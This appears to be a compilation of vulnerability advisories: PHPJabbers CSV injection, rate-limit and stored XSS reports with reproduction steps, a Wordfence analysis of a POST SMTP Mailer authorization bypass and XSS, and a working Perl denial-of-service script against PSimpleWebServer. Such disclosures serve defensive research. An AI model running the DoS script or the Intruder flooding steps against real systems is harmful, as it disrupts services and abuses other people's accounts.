<pre><code># Exploit Title: PHPJabbers Restaurant Booking System v3.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/restaurant-booking-system/#sectionDemo<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51313<br /><br />Descriptions:<br />PHPJabbers Restaurant Booking System v3.0 is vulnerable to CSV<br />injection vulnerability which allows an attacker to execute remote<br />code. The vulnerability exists due to insufficient input validation on<br />the Unique ID field in the Reservations list that is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51313)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Bus Reservation System v1.1 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/bus-reservation-system/#sectionDemo<br /># Version: v1.1<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51316<br /><br />Descriptions:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Bus Reservation System v1.1 allows attackers to send an excessive<br />amount of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large amount of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL<br />https://demo.phpjabbers.com/1704800561_577/index.php?controller=pjAdmin&action=pjActionLogin<br />2. Now use the account mail that is already registered on this website.<br />3. Capture request data using burp suite and send it to Intruder Tab<br />4. Configure Intruder and Start Attack<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51316)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Restaurant Booking System v3.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/restaurant-booking-system/#sectionDemo<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51314<br /><br />Descriptions:<br />PHPJabbers Restaurant Booking System v3.0 is vulnerable to Rate<br />limiting. Rate limiting is implemented in web applications and APIs to<br />prevent abuse, such as brute-force attacks or excessive requests that<br />could lead to resource exhaustion. When a rate limit is bypassed or<br />not properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Login to your dashboard.<br />2. Goto System Options Menu then open the Email Settings section.<br />3. Now use any email and name in the Email address and Name field.<br />4. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51314)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Event Booking Calendar v4.0 - No Rate<br />Limit on Forgot Password<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51294<br /><br />Descriptions:<br />A serious security vulnerability exists when there is no rate limit<br />implemented on the "Forgot Password" functionality of a system. This<br />oversight enables malicious actors to exploit the system by launching<br />password reset requests in rapid succession, known as "password<br />bombing" or "password reset bombing." Without rate limiting, attackers<br />can flood the system with a large number of password reset attempts,<br />potentially causing service disruptions, overwhelming email servers,<br />and facilitating unauthorized access to user accounts. Implementing<br />proper rate limiting mechanisms is crucial to mitigate the risk of<br />such attacks and enhance the overall security posture of the system.<br /><br />Steps to Reproduce:<br /><br />1. Visit this URL<br />https://demo.phpjabbers.com/1700468974_388/index.php?controller=pjBase&action=pjActionForgot<br />2. Now use the account mail that is already registered on this website.<br />3. Capture request data using burp suite and send it to Intruder Tab<br />4. Configure Intruder and Start Attack<br />5. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51294)<br /><br /><br /><br /># Exploit Title: PHPJabbers Event Booking Calendar v4.0 Missing Rate Limiting<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51293<br /><br />Descriptions:<br />PHPJabbers Event Booking Calendar v4.0 is vulnerable to Rate limiting.<br />Rate limiting is implemented in web applications and APIs to prevent<br />abuse, such as brute-force attacks or excessive requests that could<br />lead to resource exhaustion. When a rate limit is bypassed or not<br />properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Login to your dashboard.<br />2. Goto System Options Menu then open the Email Settings section.<br />3. Now use any email and name in the Email address and Name field.<br />4. Check your email.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51293)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Car Park Booking System v3.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-park-booking/#sectionDemo<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51311<br /><br />Descriptions:<br />PHPJabbers Car Park Booking System v3.0 is vulnerable to CSV injection<br />vulnerability which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct a<br />CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51311)<br /></code></pre>
<pre><code>Vulnerability Summary from Wordfence Intelligence<br /><br />Description: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress <= 2.8.7 – Authorization Bypass via type connect-app API <br /><br />Affected Plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress<br /><br />Plugin Slug: post-smtp<br /><br />Affected Versions: <= 2.8.7<br /><br />CVE ID: CVE-2023-6875<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Ulyses Saicha <br /><br />Fully Patched Version: 2.8.8<br /><br />Bounty Awarded: $4,125.00<br /><br />The "POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress" plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.<br /><br />Description: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress <= 2.8.7 – Unauthenticated Stored Cross-Site Scripting via device <br /><br />Affected Plugin: POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress<br /><br />Plugin Slug: post-smtp<br /><br />Affected Versions: <= 2.8.7<br /><br />CVE ID: CVE-2023-7027<br /><br />CVSS Score: 7.2 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Sean Murphy <br /><br />Fully Patched Version: 2.8.8<br /><br />Bounty Awarded: $825.00<br /><br />The "POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘device’ header in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Technical Analysis #1: Authorization Bypass via type connect-app API<br /><br />The POST SMTP Mailer plugin helps configure an SMTP mailer in WordPress, replacing the default PHP mail function to improve email delivery. In addition, a mobile application can be connected to the plugin using a generated auth key. Examining the code reveals that the plugin uses the connect_app() function in the Post_SMTP_Mobile_Rest_API class to save the mobile application connection settings.<br /><br />[View this code snippet on the blog] <br /><br />Knowledge of a randomly generated authentication nonce is required in order to set the value of the FCM token. However, the plugin deletes the auth token in all cases. This means that after sending the request, the auth nonce is always empty. This made it possible for the attacker to set the FCM token in the next request, providing a zero value for the auth key which would successfully validate as true.<br /><br />With the connected application, it is possible to access and view all emails, including password reset emails. This can be used for complete site compromise by an attacker triggering a password reset for a site’s administrator user, and then obtaining the password reset email through the log data. Once an attacker has access to this key, they can reset the password for that user and log in to the account.<br /><br />Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites.<br /><br />Technical Analysis #2: Unauthenticated Stored Cross-Site Scripting via device<br /><br />In the same connect_app() function of the plugin, the mobile application connection settings include the device value. Examining the code reveals that a sanitization function is missing at the device value input in the connect_app() function, and escaping is also missing at the output in the section() function.<br /><br />[View this code snippet on the blog] <br /><br />This makes it possible for unauthenticated attackers to inject arbitrary web scripts, which will execute whenever an administrator opens the mobile application settings page. As with all Cross-Site Scripting vulnerabilities, this can be leveraged by an attacker to achieve remote code execution.<br /><br />Wordfence Firewall<br /><br />The following graphic illustrates how the Wordfence firewall prevents an attacker from successfully exploiting the authorization bypass vulnerability.<br /><br />post-smtp-mailer-authorization-bypass-howto-wordfence-firewall <br /><br />Disclosure Timeline<br /><br />December 8, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion for a separate vulnerability in the plugin.<br /><br />December 14, 2023 – We receive the submission of the Authorization Bypass vulnerability in POST SMTP Mailer via the Wordfence Bug Bounty Program.<br /><br />December 15, 2023 – We validate the report and confirm the proof-of-concept exploit.<br /><br />December 15, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />December 19, 2023 – We receive the submission of the Stored Cross-Site Scripting vulnerability in POST SMTP Mailer via the Wordfence Bug Bounty Program.<br /><br />December 20, 2023 – We validate the report and confirm the proof-of-concept exploit. We send over the full disclosure details for the unauthenticated XSS.<br /><br />January 1, 2024 – The fully patched version, 2.8.8, is released.<br /><br />January 3, 2024 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.<br /><br />February 2, 2024 – Wordfence Free users receive the same protection.<br /><br />Conclusion<br /><br />In this blog post, we detailed an Authorization Bypass and a Stored Cross-Site Scripting vulnerabilities within the POST SMTP Mailer plugin affecting versions 2.8.7 and earlier. The Authorization Bypass vulnerability allows unauthenticated threat actors to reset the API key used to authenticate to the mailer and view logs, including password reset emails, resulting in a full site compromise. The Stored Cross-Site Scripting vulnerability allows unauthenticated threat actors to inject malicious web scripts into pages. The vulnerabilities have been fully addressed in version 2.8.8 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of POST SMTP Mailer.<br /><br />Wordfence users running Wordfence Premium , Wordfence Care , and Wordfence Response have been protected against these vulnerabilities as of January 3, 2024. Users still using the free version of Wordfence will receive the same protection on February 2, 2024.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket::INET;<br /><br /># Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 11 january 2024<br /># Vendor Homepage: http://www.pmx.it/<br /># Download to demo: https://drive.google.com/file/d/1tAK7dKl3yBPQSeo5Tid4p2FETyh8Zjvs/view?usp=sharing<br /># Notification vendor: No reported<br /># Tested Version: PSimpleWebServer 2.2-rc2 <br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denial of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=YFfBuWnHeQY<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The server did not properly handle request with large amounts of data to web server.<br />#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /><br />print "\t ==> Connecting to webserver... \n\n";<br />sleep(1);<br /><br />our $exploit = "\x41"x2014;<br /><br />$exploit = "x\41"x2104;<br /><br />if ($socket = IO::Socket::INET->new<br /> (PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => "TCP"))<br />{<br /> $header =<br /> "GET / HTTP/1.1\r\n".<br /> "Host: ".$ip." \r\n".<br /> "Connection:".$exploit."\r\n";<br /> print $socket $header."\r\n";<br /> sleep(1);<br /> close($socket);<br />}<br /> <br />else<br />{<br /> print "[-] Connection to $ip failed!\n";<br /> exit;<br />}<br /> <br /> <br />print "\t ==> Done! Exploited!";<br /> sub intro {<br /> print q {<br /><br /><br /> ,,__<br /> .. .. / o._) <br /> /--'/--\ \-'|| <br /> / \_/ / | <br /> .'\ \__\ __.'.' <br /> )\ | )\ | <br /> // \\ // \\<br /> ||_ \\|_ \\_<br /> '--' '--'' '--' <br /> <br /> [+] SimpleWebServer 2.2-rc2 - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print "\n\tUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /><br />#3. Solution/ How to fix:<br /><br /># This version product is deprecated<br /><br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Event Ticketing System v1.0 - No Rate Limit<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51339<br /><br />Descriptions:<br />A lack of rate limiting in the "Forgot Email" feature of PHPJabbers<br />Event Ticketing System v1.0 allows attackers to send an excessive<br />amount of reset requests for a legitimate user, leading to a possible<br />Denial of Service (DoS) via a large amount of generated e-mail<br />messages.<br /><br />Steps to Reproduce:<br />1. Visit this URL<br />https://demo.phpjabbers.com/1704798072_893/index.php?controller=pjAdmin&action=pjActionIndex<br />2. Now use the account mail that is already registered on this website.<br />3. Capture request data using burp suite and send it to Intruder Tab<br />4. Configure Intruder and Start Attack<br />5. Check your email.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51339)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - CSV Injection<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11<br /># CVE-2023-51336<br /><br />Descriptions:<br />PHPJabbers Meeting Room Booking System v1.0 is vulnerable to CSV<br />injection vulnerability which allows an attacker to execute remote<br />code. The vulnerability exists due to insufficient input validation on<br />the Unique ID field in the Reservations list that is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51336)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Meeting Room Booking System v1.0 -<br />Multiple Stored XSS<br /># Date: 19/12/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link:<br />https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo<br /># Version: v1.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-51338<br /><br />Descriptions:<br />PHPJabbers Meeting Room Booking System v1.0 is vulnerable to Multiple<br />Stored Cross-Site Scripting. Multiple Stored XSS is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into the content that is<br />permanently stored on the server.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Vulnerable parameters are "title, name".<br />3. Go to System Users Menu then click add user.<br />4. Then use any XSS Payload in "Name" input field and Save.<br />5. You will see xss popup.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51338)<br /></code></pre>